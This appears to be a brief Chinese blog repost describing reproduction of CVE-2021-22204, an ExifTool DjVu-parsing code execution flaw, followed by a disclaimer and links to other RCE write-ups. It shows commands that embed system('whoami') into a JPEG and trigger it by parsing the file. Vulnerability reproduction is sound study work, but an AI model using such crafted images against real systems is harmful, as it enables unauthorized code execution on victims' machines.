CVE-2021-22204 ExifTool任意代码执行
github poc下载
ExifTool 7.44至12.23在DjVu模块中存在一个错误,该错误允许在解析恶意图像时执行任意代码
meta-data为MIME Type : image/jpeg"即jpg图片可以达成RCE
exiftool -config eval.config mojave.jpg -eval='system("whoami")'
exiftool mojave.jpg
可以看到成功执行了命令
CVE-2021-22204:ExifTool任意代码执行
免责声明!
本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。
猜您在找
CVE-2021-21220 Chrome远程代码执行漏洞复现
XStream远程代码执行(CVE-2021-29505 )
CVE-2021-2109 Weblogic Server远程代码执行
CVE-2021-21220 Chrome远程代码执行漏洞复现
CVE-2021-2109 Weblogic Server远程代码执行
文本编辑器Vim/Neovim任意代码执行漏洞(CVE-2019-12735)
Tomcat远程任意代码执行漏洞及其POC(CVE-2017-12617)
php-fpm在nginx特定环境下的任意代码执行漏洞(CVE-2019-11043)
WebLogic 任意文件上传 远程代码执行漏洞 (CVE-2018-2894)------->>>任意文件上传检测POC
PbootCMS任意代码执行